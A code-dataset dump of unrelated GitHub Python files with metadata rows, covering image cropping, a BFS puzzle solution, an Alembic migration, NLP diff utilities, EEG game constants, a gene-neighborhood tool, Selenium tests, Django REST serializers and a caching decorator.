w, h = im.size
aspect = w/h
if w > h:
new_h = HEIGHT
new_w = aspect*new_h
else:
new_w = WIDTH
new_h = (1/aspect)*new_w
im = im.resize((int(new_w), int(new_h)), Image.Resampling.BILINEAR).convert("RGB")
im = ImageOps.exif_transpose(im)
w, h = im.size
left = (w - WIDTH)/2
top = (h - HEIGHT)/2
right = (w + WIDTH)/2
bottom = (h + HEIGHT)/2
# Crop the center of the image
im = im.crop((left, top, right, bottom))
im.save(os.path.join(OUT_DIR, f)) | cpsiff/stable_diffusion | crop.py | crop.py | py | 847 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.listdir",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number":... |
20667232591 | # 숨바꼭질 1차원 bfs로 next x 값을 x-1,x+1,x*2 비교해주면서 다음값에 +1씩
from collections import deque
import sys
input=sys.stdin.readline
n,k=map(int,input().split())
graph=[0]*100001
def bfs(n):
queue=deque()
queue.append(n)
while queue:
x=queue.popleft()
if x==k:
return graph[x]
for nx in (x-1,x+1,x*2):
if 0<=nx<100001 and not graph[nx]:
graph[nx]=graph[x]+1
queue.append(nx)
print(bfs(n)) | jeongkwangkyun/algorithm | BFS/1697.py | 1697.py | py | 465 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sys.stdin",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "collections.deque",
"line_number": 11,
"usage_type": "call"
}
] |
9529021289 | """add original_taxa_id_to_taxa
Revision ID: 6938832cbce2
Revises: 24bc88e66a5b
Create Date: 2020-10-16 04:57:24.178833
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '6938832cbce2'
down_revision = '24bc88e66a5b'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('samples_taxa', sa.Column('original_taxon_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'samples_taxa', 'taxa_crosswalk', ['original_taxon_id'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_constraint(None, 'samples_taxa', type_='foreignkey')
op.drop_column('samples_taxa', 'original_taxon_id')
# ### end Alembic commands ###
| eODP/api | migrations/versions/6938832cbce2_add_original_taxa_id_to_taxa.py | 6938832cbce2_add_original_taxa_id_to_taxa.py | py | 863 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "alembic.op.add_column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integer... |
3428235704 | import difflib
import re
from typing import Literal, TypedDict
import nltk
def segment_sentences_with_nltk(text: str) -> list[str]:
sent_detector = nltk.data.load("tokenizers/punkt/german.pickle")
return list(sent_detector.tokenize(text.strip()))
_PUNCTUATION_IN_MIDDLE_RE = re.compile("([\\w\\s,;:\\-]*)([?!.])([\\w\\s,:;\\-]*)")
_END_PUNCTIONATION_FROM_MIDDLE_RE = re.compile(r"([\w\s,;:\-]+)([?!]+)([\w\s,:;\-]+)")
_END_PUNCTIONATION_RE = re.compile(r'([\w\s,;:"\-()]+)[.?!]+(»|\"|\')*\Z')
_UPPERCASE_START_RE = re.compile(r"\A(«|\"|\')*[A-ZÄÖÜ]")
_LOWERCASE_START_RE = re.compile(r"\A[a-zäöü]")
_NON_WHITESPACE_RE = re.compile(r"\S+")
def contains_end_punctuation_in_the_middle(seq: str) -> bool:
return _PUNCTUATION_IN_MIDDLE_RE.search(seq) is not None
def retrieve_end_punctuation_from_the_middle(seq: str) -> str | None:
end_punctuation = _END_PUNCTIONATION_FROM_MIDDLE_RE.search(seq)
if end_punctuation:
return end_punctuation.group(2)
return None
def ends_with_end_punctuation(seq: str) -> bool:
return _END_PUNCTIONATION_RE.search(seq) is not None
def is_short_sequence(seq: str, length: int) -> bool:
return len(seq) < length
def starts_with_uppercase_letter(seq: str) -> bool:
uppercase_at_beginning = _UPPERCASE_START_RE.search(seq)
return uppercase_at_beginning is not None
def starts_with_lowercase_letter(seq: str) -> bool:
lowercase_at_beginning = _LOWERCASE_START_RE.search(seq)
return lowercase_at_beginning is not None
def calculate_sequence_similarity(a: str, b: str) -> float:
return difflib.SequenceMatcher(None, a, b).ratio()
def retrieve_match_range(seq1: str, seq2: str) -> list[difflib.Match]:
seq_match = difflib.SequenceMatcher(None, seq1.strip(), seq2.strip())
return seq_match.get_matching_blocks()
def retrieve_mismatch_ranges(
seq1: str, seq2: str
) -> list[tuple[str, int, int, int, int]]:
seq_match = difflib.SequenceMatcher(None, seq1, seq2)
return seq_match.get_opcodes()
def check_overlap_with_seq_beginning(
s1: str, s2: str
) -> tuple[Literal[True], str, int] | tuple[Literal[False], str, None]:
# s1 is modifying seq and s2 is sen
index = 1
s1_beginning = s1[:index]
if s1_beginning not in s2:
return False, "", None
while s1_beginning in s2 and len(s1_beginning) < len(s1):
index += 1
s1_beginning = s1[:index]
return True, s1_beginning, index
def check_overlap_with_seq_end(
s1: str, s2: str
) -> tuple[Literal[True], str, int] | tuple[Literal[False], str, None]:
# s1 is modifying seq and s2 is sen
index = len(s1)
s1_end = s1[index:]
if s1_end not in s2:
return False, "", None
while s1_end in s2 and len(s1_end) < len(s1):
index -= 1
s1_end = s1[index:]
return True, s1_end, index
def retrieve_token_indices(
prev_sen: str, cur_sen: str
) -> tuple[list[tuple[str, int, int]], list[tuple[str, int, int]]]:
prev_toks_with_indices = [
(match.group(0), match.start(), match.end() - 1)
for match in _NON_WHITESPACE_RE.finditer(prev_sen)
]
cur_toks_with_indices = [
(match.group(0), match.start(), match.end() - 1)
for match in _NON_WHITESPACE_RE.finditer(cur_sen)
]
return prev_toks_with_indices, cur_toks_with_indices
# def identify_affected_tokens(
# prev_sen_toks: list, cur_sen_toks: list, edit_type: str
# ) -> list:
# affected_tokens = []
# if prev_sen_toks and cur_sen_toks:
# for pt, ct in itertools.zip_longest(prev_sen_toks, cur_sen_toks):
# print(ct)
# if pt["text"] != ct["text"]:
# if edit_type == "insertion":
# affected_tokens.append({"prev": None, "cur": ct})
# elif edit_type == "deletion":
# affected_tokens.append({"prev": pt, "cur": None})
# elif not prev_sen_toks and cur_sen_toks:
# for ct in cur_sen_toks:
# affected_tokens.append({"prev": None, "cur": ct})
# elif prev_sen_toks and not cur_sen_toks:
# for pt in prev_sen_toks:
# affected_tokens.append({"prev": pt, "cur": None})
# print("AFFECTED TOKENS:")
# print(affected_tokens)
# return affected_tokens
# def retrieve_affected_tokens(prev_sen, cur_sen) -> list:
# # affected_tokens is a list of tuples: previous word, current word with their indices
# affected_tokens = []
# prev_toks_with_indices, cur_toks_with_indices = retrieve_token_indices(
# prev_sen, cur_sen
# )
# _, mismatch_range, _ = retrieve_mismatch_range_for_sentence_pair(prev_sen, cur_sen)
# if mismatch_range:
# # as there is only one edit per TPSF (one sequence gets changed), there can always be only one mismatch range
# # if more than one mismatch range exists, merge all consecutive mismatch ranges together
# # multiple mismatch ranges occur if the inserted or deleted sequence is very short
# # and can be found at another position in the sentence which hasn't been edited
# mismatch_range = range(mismatch_range[0][0], mismatch_range[-1][-1] + 1)
# for pt, ct in itertools.zip_longest(
# prev_toks_with_indices, cur_toks_with_indices
# ):
# if pt is not None and ct is not None:
# if (
# mismatch_range[0] <= pt[2]
# and pt[1] <= mismatch_range[-1]
# or mismatch_range[0] <= ct[2]
# and ct[1] <= mismatch_range[-1]
# ): # TODO to test
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# elif pt is None:
# pt = ("", None, None)
# if mismatch_range[0] <= ct[2] and ct[1] <= mismatch_range[-1]:
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# elif ct is None:
# ct = ("", None, None)
# if mismatch_range[0] <= pt[2] and pt[1] <= mismatch_range[-1]:
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# else:
# for ct in cur_toks_with_indices:
# pt = ("", None, None)
# affected_token_pair = {"prev_tok": pt, "cur_tok": ct}
# affected_tokens.append(affected_token_pair)
# return affected_tokens
# def filter_out_irrelevant_tokens(tokens: list) -> list:
# relevant_tokens = []
# for tok in tokens:
# if tokens['prev'][1] is not None and tokens['cur'][1] is not None:
# relevant_tokens.append(tok)
# return relevant_tokens
class TokenDict(TypedDict):
text: str
class TokensDict(TypedDict):
prev: TokenDict | None
cur: TokenDict | None
def check_edit_distance(tokens: TokensDict) -> int:
prev_tok = "" if tokens["prev"] is None else tokens["prev"]["text"]
cur_tok = "" if tokens["cur"] is None else tokens["cur"]["text"]
return nltk.edit_distance(prev_tok, cur_tok)
def retrieve_mismatch_range_for_sentence_pair(
prev_sen: str, cur_sen: str
) -> tuple[str | None, list[range], str]:
seq_match = difflib.SequenceMatcher(None, prev_sen, cur_sen)
prev_cur_match = seq_match.get_opcodes()
mismatch_range = []
edit = None
relevant = ""
# there is always one mismatch range, as TPSF capturing happens upon each edit,
# two separate edits on the same TPSF are not possible
# TODO make it more generic
for m in prev_cur_match:
if m[0] == "delete":
edit = m[0]
mismatch_range.append(range(m[1], m[2] + 1))
relevant = "prev"
elif m[0] == "insert":
edit = m[0]
mismatch_range.append(range(m[3], m[4] + 1))
relevant = "cur"
elif m[0] == "replace":
edit = m[0]
mismatch_range.append(range(max(m[1], m[3]), max(m[2] + 1, m[4] + 1)))
relevant = (
"prev"
if m[1] in mismatch_range[0] and m[2] in mismatch_range[-1]
else "cur"
)
return edit, mismatch_range, relevant
| mulasik/wta | wta/utils/nlp.py | nlp.py | py | 8,344 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "nltk.data.load",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "nltk.data",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "re.compile",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number"... |
34366237651 | # coding=utf-8
"""Constantes of ZETA Games first App"""
import pygame as pg
import numpy as np
from subprocess import Popen, PIPE
from threading import Thread
from subprocess import call
# Personnalisation de la fenêtre
titre_fenetre = "ZETA GAMES"
image_icone = "images/zeta.png"
w_display = 480
h_display = 270
pg.font.init()
black = (0,0,0)
white = (255,255,255)
red = (255,0,0)
choice = ''
# Listes des images du jeu
'''constants for streaming loop'''
buffersize = 200 # a bit more than one second of data,
bufferRS1 = []
bufferRS2 = []
bufferT = []
nb_channels = 4
nb_lines = 5 # there are 5 lines per sample, the sample number, and the 4 channels data
ind_2_remove_in_buffer1 = []
ind_time = []
ind_channel_1 = []
ind_channel_2 = []
ind_channel_3 = []
ind_channel_4 = []
ratios_ch1 = []
ratios_ch2 = []
ratios_ch3 = []
ratios_ch4 = []
mean_array_uvT = []
mean_array_uvRS2 = []
mean_array_uvRS1 = []
'''Load images, sonds libraries'''
buttonText = pg.font.Font('fonts/couture-bld.otf', 15) # font for Menu button
progressionTextFont = pg.font.Font('fonts/couture-bld.otf', 5) # font for questions
buttonTextHuge = pg.font.Font('fonts/couture-bld.otf', 20) # font for Menu button
image_home = 'images/homev011.png'
scoreDigitImages = ['images/0.png', 'images/1.png', 'images/2.png', 'images/3.png', 'images/4.png', 'images/5.png',
'images/6.png', 'images/7.png', 'images/8.png', 'images/9.png']
'''training game'''
backgroundImage = 'images/background.png' # which is a beach now
oldPosy = 180 # initial position of the Bird
# steps = 10
minDisplayY = 15 # min and max position that the bird can reach, 10px is top of the screen
maxDisplayY = 220
maxScore = 15 # score ruler is 15 max
minScore = 1
scoreT = 0
steps = 1.*buffersize/40
newPosy = maxDisplayY
veryOldPosy = maxDisplayY
oldPosy = maxDisplayY
# deltaPosy_1 = 1. * (newPosy - oldPosy) / steps
# deltaPosy_2 = 1. * (oldPosy - veryOldPosy) / steps
maxRatioAlphaOverDelta = 1
minRatioAlphaOverDelta = 0
coef_mad = 3
'''Resting state'''
timer = ['images/0.png', 'images/1.png', 'images/2.png', 'images/3.png', 'images/4.png', 'images/5.png',
'images/6.png', 'images/7.png', 'images/8.png', 'images/9.png']
restingStateDebutPath = 'images/restingStateDebut.png'
restingStateFinPath = 'images/restingStateFin.png'
restingStateDuration = 40 # in seconds
secRS2 = 0
secRS1 = 0
durationSessionInit = 350
durationSession = durationSessionInit
restingState1isDone = 0
endSessionImg = 'images/endSession.png'
'''Progression '''
progressionCoeff = 100 #coefficient that higher the progression metric since it's a low coeff ~ 0.001
displayedMetric = 0
'''Navigation among the pages'''
# booleans for each window
punchinBall = 0
homeOn = 1
training = 0
restingState1 = 0
restingState2 = 0
'''FREQ'''
FreqRange = 'alpha'
freqMaxAlpha = 11
if FreqRange == '':
logging.warning('No frequency passed as argument')
if FreqRange == 'alpha':
freqRange = np.array([6, 13])
elif FreqRange == 'gamma':
freqRange = np.array([25, 50])
elif FreqRange == 'beta':
freqRange = np.array([12, 25])
elif FreqRange == 'theta':
freqRange = np.array([4, 7])
elif FreqRange == 'XXII_beta':
freqRange = np.array([15, 23])
elif FreqRange == 'XXII_gamma':
freqRange = np.array([38, 40])
''' Save buffer, to keep data records somewhere'''
saved_bufferRS1 = []
saved_bufferRS2 = []
saved_bufferRS1_ch1 = []
saved_bufferRS1_ch2 = []
saved_bufferRS1_ch3 = []
saved_bufferRS1_ch4 = []
saved_bufferRS2_ch1 = []
saved_bufferRS2_ch2 = []
saved_bufferRS2_ch3 = []
saved_bufferRS2_ch4 = []
saved_bufferT_ch1 = []
saved_bufferT_ch2 = []
saved_bufferT_ch3 = []
saved_bufferT_ch4 = []
sessionT = 0
sessionRS1 = 0
sessionRS2 = 0
sessionEnded = 0
'''for the fft '''
length = 200
NFFT = 200
fs_hz = 200
# overlap = NFFT/2 # useless for now
'''Neurofeedback loop'''
# newMean = 0 # useless now
# oldMean = 5E-13 # useless now
mean_array_alphaT = []
mean_array_deltaT = []
ratio_arrayT = []
mean_array_alphaRS1 = []
mean_array_deltaRS1 = []
ratio_arrayRS1 = []
mean_array_alphaRS2 = []
mean_array_deltaRS2 = []
ratio_arrayRS2 = []
print1 = 0
'''reorder channels index'''
# the following loop saves the index of the buffer that are interesting, without the channel id every 0 [nb_channels]
for ind in range(0, buffersize):
ind_channel_1.append(ind*4+1)
ind_channel_2.append(ind*4+2)
ind_channel_3.append(ind*4+3)
ind_channel_4.append(ind*4+4)
| zeta-technologies/workIP | constantes.py | constantes.py | py | 4,460 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pygame.font.init",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.font",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "pygame.font.Font",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "pygame.font",
... |
23854783061 | """
Gene Neighborhoods
___________________
"""
import logging
import click
from dram2.cli.context import DramContext, DEFAULT_KEEP_TMP, __version__
def find_neighborhoods(
annotations, genes_from_ids, distance_bp=None, distance_genes=None
):
# get neighborhoods as dataframes
neighborhood_frames = list()
for neighborhood_number, gene in enumerate(genes_from_ids):
gene_row = annotations.loc[gene]
scaffold_annotations = annotations.loc[
annotations["scaffold"] == gene_row["scaffold"]
]
# get neighbors based on bp
if distance_bp is not None:
right_dist = gene_row["end_position"] + distance_bp
left_dist = gene_row["start_position"] - distance_bp
neighborhood_annotations = scaffold_annotations.loc[
(scaffold_annotations["end_position"] >= left_dist)
& (scaffold_annotations["start_position"] <= right_dist)
]
else:
neighborhood_annotations = scaffold_annotations
# get neighbors based on annotations
if distance_genes is not None:
right_genes = gene_row["gene_position"] + distance_genes
left_genes = gene_row["gene_position"] - distance_genes
neighborhood_annotations = scaffold_annotations.loc[
(scaffold_annotations["gene_position"] >= left_genes)
& (scaffold_annotations["gene_position"] <= right_genes)
]
# add neighborhood number and neighborhood center as columns
neighborhood_annotations["neighborhood_number"] = neighborhood_number
neighborhood_annotations["neighborhood_center"] = [
i == gene for i in neighborhood_annotations.index
]
neighborhood_frames.append(neighborhood_annotations)
if len(neighborhood_annotations) == 0:
warnings.warn("")
# merge data frames and write to file
return pd.concat(neighborhood_frames)
def get_gene_neighborhoods(
input_file,
output_dir,
logger: logging.Logger,
genes=None,
identifiers=None,
categories=None,
genes_loc=None,
scaffolds_loc=None,
distance_genes=None,
distance_bp=None,
custom_distillate=None,
):
# check inputs, make output
if distance_genes is None and distance_bp is None:
raise ValueError("Must provide distance away in bp, genes or both.")
# get data
annotations = pd.read_csv(input_file, sep="\t", index_col=0)
genes_from_ids = get_genes_from_identifiers(
annotations,
genes=genes,
identifiers=identifiers,
categories=categories,
custom_distillate=custom_distillate,
)
if len(genes_from_ids) == 0:
raise ValueError(
"No genes were found based on your filtering parameters. No neighborhoods will be generated."
)
mkdir(output_dir)
neighborhood_all_annotations = find_neighborhoods(
annotations, genes_from_ids, distance_bp, distance_genes
)
neighborhood_all_annotations.to_csv(
path.join(output_dir, "neighborhood_annotations.tsv"), sep="\t"
)
logging.info("Neighborhood Annotations witten to tsv")
# filter files if given
if genes_loc is not None:
output_fasta_generator = (
i
for i in read_sequence(genes_loc, format="fasta")
if i.metadata["id"] in neighborhood_all_annotations.index
)
# TODO: potentially generate one fasta file per neighborhood
write_sequence(
output_fasta_generator,
format="fasta",
into=path.join(
output_dir, "neighborhood_genes.%s" % genes_loc.split(".")[-1]
),
)
logging.info("Gene Neighborhood fasta generated")
if scaffolds_loc is not None:
neighborhood_all_annotations["scaffold_mod"] = [
"%s_%s" % (row["fasta"], row["scaffold"])
for i, row in neighborhood_all_annotations.iterrows()
]
neighborhood_scaffolds = list()
for scaffold in read_sequence(scaffolds_loc, format="fasta"):
if (
scaffold.metadata["id"]
in neighborhood_all_annotations["scaffold_mod"].values
):
scaffold_frame = neighborhood_all_annotations.loc[
neighborhood_all_annotations["scaffold_mod"]
== scaffold.metadata["id"]
]
for neighborhood, neighborhood_frame in scaffold_frame.groupby(
"neighborhood_number"
):
neighborhood_frame = neighborhood_frame.sort_values(
"start_position"
)
neighborhood_scaffolds.append(
scaffold[
neighborhood_frame["start_position"][
0
]: neighborhood_frame["end_position"][-1]
]
)
write_sequence(
(i for i in neighborhood_scaffolds),
format="fasta",
into=path.join(output_dir, "neighborhood_scaffolds.fna"),
)
logging.info("Scaffolds Neighborhood fasta generated")
@click.command(
"neighbors",
context_settings=dict(help_option_names=["-h", "--help"]),
)
@click.pass_context
def neighbors_cmd(
ctx: click.Context,
):
"""
Pull Genes based on Their Neighborhoods
___
DRAM2 Can pull genes based on their proximity to other genes. I have not even written documentation for this yet.
"""
print("This command requires more work to function in dram2")
| rmFlynn/collection_of_typical_ocoli_samples | dram2/neighbors/__init__.py | __init__.py | py | 5,720 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "logging.Logger",
"line_number": 57,
"usage_type": "attribute"
},
{
"api_name": "logging.info",
"line_number": 93,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "logging.info",
"li... |
7955053783 | from selenium import webdriver
from commom.BaseTest import Base1
from utils.ReadProperties import Read
from commom.WebDriverEngine import WebDriverEngine
from commom.ElementFinder import ElementFinder
import time
from selenium.webdriver.common.keys import Keys
import unittest
from utils.HTMLTestRunnerEN import HTMLTestRunner
#测试类,调用方法传参
class Test(unittest.TestCase):
# 登录成功√
def test_1_loginSuccess(self):
WebDriverEngine().type_scy("id=account","admin")
WebDriverEngine().type_scy("id=password","123456")
WebDriverEngine().click_scy("id=submit")
time.sleep(5)
#登录失败
# def loginFail(self):
# WebDriverEngine().type_scy("id=account","admin")
# WebDriverEngine().type_scy("id=password","1234")
# WebDriverEngine().click_scy("id=submit")
# ElementFinder().q()
#9843联系人编辑分组√
def test_2_editCall(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'联系人')]")
time.sleep(3)
# WebDriverEngine().enterFrame("iframe-dashboard")
WebDriverEngine().click_scy("xpath=/html/body/div/div/table/tbody/tr/td[4]/a[1]")
time.sleep(3)
WebDriverEngine().typeAndClear_scy("xpath=//input[@autocomplete='on']","kkk")
WebDriverEngine().click_scy("xpath=//button[contains(.,'保存')]")
# ElementFinder().refresh()
time.sleep(5)
WebDriverEngine().enterFrame("iframe-dashboard")
time.sleep(3)
# 项目挂起√
def test_3_protect(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'项目')]")
time.sleep(3)
WebDriverEngine().click_scy("xpath=/html/body/div/div/table/tbody/tr[1]/td[9]/a[4]")
WebDriverEngine().click_scy("xpath=/html/body/div[2]/div/div/div[2]/button[1]")
WebDriverEngine().click_scy("xpath=/html/body/div[2]/div/div/div[2]/button")
# 9836报销情况√
def test_4_money(self):
WebDriverEngine().click_scy("xpath=//a[contains(.,'审批')]")
time.sleep(3)
WebDriverEngine().click_scy("xpath=/html/body/nav[2]/ul/li[7]/a")
time.sleep(3)
WebDriverEngine().leaveFrame()
# 9834桌面小图标功能√
def test_5_smallTable(self):
WebDriverEngine().click_scy("xpath=//button[@id='showDesk']")
def t_send():
# 所要执行的测试用例所在的位置
test_dir = Read().getValue('test_dir')
# 测试报告所在的路径
test_report = Read().getValue('test_report')
# 查找想要执行的文件
discover = unittest.defaultTestLoader.discover(test_dir, pattern='ranzhi_test.py')
# 使用HTMLTestRunner来生成testRunner,生成html测试报告
now_time = time.strftime("%Y%m%d%H%M%S")
file_name = test_report + '\\' + now_time + 'result.html'
fp = open(file_name, 'wb')
runner = HTMLTestRunner(stream=fp, title="测试报告", description="运行环境:firefox")
runner.run(discover)
fp.close()
if __name__=='__main__':
t_send()
| King-BAT/RanZhi | RanZhiPython/testcase/ranzhi_test.py | ranzhi_test.py | py | 3,045 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "unittest.TestCase",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "commom.WebDriverEngine.WebDriverEngine",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "commom.WebDriverEngine.WebDriverEngine",
"line_number": 16,
"usage_type": "... |
35268565961 | # A program that will list counties and use probability function to output theres possible frequency.
# Author: Ryan Cox
import numpy as np
import matplotlib.pyplot as plt
# make the array of occurences
possibleCounties = ["Kerry", "Dublin", "Galway", "Cork", "Meath"]
# Random.choice() is a probability function. First is the objects, then the probability of their frequency(p),
# Size is the size of the sample.
# Frequency(p) must equal to one.
counties = np.random.choice(possibleCounties, p=[0.3, 0.4, 0.1, 0.1, 0.1 ] ,size=(100))
#unique_elements is the name of the counties. counts_elements is their frequency. return_counts=True says yes to returning the count.
unique, counts = np.unique(counties, return_counts=True)
# counts is the volume of the pie. unique are the labels i.e counties
plt.pie(counts, labels= unique)
plt.show() | RYANCOX00/programming2021 | Week08-Plotting/Lab8.11.2.ABSolution.py | Lab8.11.2.ABSolution.py | py | 856 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "numpy.random.choice",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "numpy.unique",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.... |
73911033314 | import sys
import os
import json
import glob
sys.path.append(
os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'../python/ext-libs'))
from six import string_types
cpp = open(sys.argv[1], "w")
cpp.write(
"#include \"qgsexpression.h\"\n"
"\n"
"QHash<QString, QgsExpression::Help> QgsExpression::gFunctionHelpTexts;\n"
"\n"
"void QgsExpression::initFunctionHelp()\n"
"{\n"
" if( !gFunctionHelpTexts.isEmpty() )\n"
" return;"
)
def quote(v):
if isinstance(v, dict):
for k in v:
v[k] = quote(v[k])
return v
elif isinstance(v, list):
return map(quote, v)
elif isinstance(v, string_types):
return v.replace('"', '\\"').replace('\n', '\\n')
elif isinstance(v, bool):
return v
else:
raise BaseException("unexpected type " + repr(v))
for f in sorted(glob.glob('resources/function_help/json/*')):
with open(f) as function_file:
try:
json_params = json.load(function_file)
except:
print(f)
raise
json_params = quote(json_params)
for field in ['name', 'type']:
if not field in json_params:
raise BaseException("%s: %s missing" % (f, field))
if not json_params['type'] in ['function', 'operator', 'value', 'expression', 'group']:
raise BaseException("%s: invalid type %s " % (f, json_params['type']))
if not 'variants' in json_params:
# convert single variant shortcut to a expanded variant
v = {}
for i in json_params:
v[i] = json_params[i]
v['variant'] = json_params['name']
v['variant_description'] = json_params['description']
json_params['variants'] = [v]
name = "\"{0}\"".format(json_params['name'])
if json_params['type'] == 'operator':
for v in json_params['variants']:
if not 'arguments' in v:
raise BaseException("%s: arguments expected for operator")
if len(list(v['arguments'])) < 1 or len(list(v['arguments'])) > 2:
raise BaseException("%s: 1 or 2 arguments expected for operator")
cpp.write("\n\n gFunctionHelpTexts.insert( {0},\n Help( {0}, tr( \"{1}\" ), tr( \"{2}\" ),\n QList<HelpVariant>()".format(
name, json_params['type'], json_params['description'])
)
for v in json_params['variants']:
cpp.write(
"\n << HelpVariant( tr( \"{0}\" ), tr( \"{1}\" ),\n QList<HelpArg>()".format(v['variant'], v['variant_description']))
if 'arguments' in v:
for a in v['arguments']:
cpp.write("\n << HelpArg( \"{0}\", tr( \"{1}\" ), {2}, {3} )".format(
a['arg'],
a.get('description', ''),
"true" if a.get('descOnly', False) else "false",
"true" if a.get('syntaxOnly', False) else "false",
"true" if a.get('optional', False) else "false",
a.get('default', ''))
)
cpp.write(",\n /* variableLenArguments */ {0}".format(
"true" if v.get('variableLenArguments', False) else "false"))
cpp.write(",\n QList<HelpExample>()")
if 'examples' in v:
for e in v['examples']:
cpp.write("\n << HelpExample( tr( \"{0}\" ), tr( \"{1}\" ), tr( \"{2}\") )".format(
e['expression'],
e['returns'],
e.get('note', ''))
)
if 'notes' in v:
cpp.write(",\n tr( \"{0}\" )".format(v['notes']))
cpp.write("\n )")
cpp.write("\n )")
cpp.write("\n );")
for f in sorted(glob.glob('resources/function_help/text/*')):
n = os.path.basename(f)
with open(f) as content:
cpp.write("\n\n gFunctionHelpTexts.insert( \"{0}\",\n Help( tr( \"{0}\" ), tr( \"group\" ), tr( \"{1}\" ), QList<HelpVariant>() ) );\n".format(
n, content.read().replace("\\", "\").replace('\\', '\\\\').replace('"', '\\"').replace('\n', '\\n')))
cpp.write("\n}\n")
cpp.close()
| nextgis/nextgisqgis | scripts/process_function_template.py | process_function_template.py | py | 4,209 | python | en | code | 27 | github-code | 1 | [
{
"api_name": "sys.path.append",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": ... |
74391649314 | # -*- coding: utf-8 -*-
import functools
#写一个函数装饰器,来缓存函数的值
def cache(func):
cache_dict = {}
# @functools.wraps(func)
def wrapper(*args, **kwargs):
key = repr(*args, **kwargs)
if key in cache_dict:
return cache_dict[key]
else:
#使用cache_dict缓存同一个sql的结果
cache_dict[key] = func(*args, **kwargs)
return cache_dict[key]
wrapper.csrf_exempt = True
functools.update_wrapper(wrapper, func)
return wrapper
@cache
def execute_query(sql):
print('hit db')
return 'result'
#函数名是否发生变化,保持函数签名
print(execute_query)
# <function execute_query at 0xb709c89c>
print(execute_query('select * from table1'))
# hit db
# result
#缓存过的key不再缓存
print(execute_query('select * from table1'))
# result
print(execute_query('select * from table2'))
# hit db
# result
| hello-wn/python-basic-scripts | 20180425/use_decorator_cacheValue.py | use_decorator_cacheValue.py | py | 943 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "functools.update_wrapper",
"line_number": 18,
"usage_type": "call"
}
] |
34640319155 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from rest_framework import serializers
from database.models import CollectionItemType
from rest.serializers.object_types import items
from . import types
from rest.serializers.object_types import events
from rest.serializers.object_types import mime_types
class SelectSerializer(serializers.ModelSerializer):
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
)
class ListSerializer(serializers.ModelSerializer):
url = serializers.HyperlinkedIdentityField(
view_name='rest-api:collectionitemtype-detail')
event_types = events.SelectSerializer(
many=True,
read_only=True,
source='item_type.event_types')
mime_types = mime_types.SelectSerializer(
many=True,
read_only=True,
source='item_type.mime_types')
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
'item_type',
'event_types',
'mime_types',
'metadata_schema',
)
class DetailSerializer(serializers.HyperlinkedModelSerializer):
item_type = items.SelectSerializer(
many=False,
read_only=True)
collection_type = types.SelectSerializer(
many=False,
read_only=True)
event_types = events.SelectSerializer(
many=True,
read_only=True,
source='item_type.event_types')
mime_types = mime_types.SelectSerializer(
many=True,
read_only=True,
source='item_type.mime_types')
class Meta:
model = CollectionItemType
fields = (
'url',
'id',
'collection_type',
'item_type',
'metadata_schema',
'event_types',
'mime_types',
)
class CreateSerializer(serializers.ModelSerializer):
class Meta:
model = CollectionItemType
fields = (
'item_type',
'metadata_schema',
)
def create(self, validated_data):
collection_type = self.context['collection_type']
validated_data['collection_type'] = collection_type
return super().create(validated_data)
| CONABIO-audio/irekua | irekua/rest/serializers/object_types/data_collections/items.py | items.py | py | 2,281 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "rest_framework.serializers.ModelSerializer",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.serializers",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "database.models.CollectionItemType",
"line_number": 17,
"usage... |
17340264805 | import re
from datetime import datetime
import requests
from src import utils
from src.connectors import KafkaClient, PostgreSQLConnector
class SitesAvailability:
"""
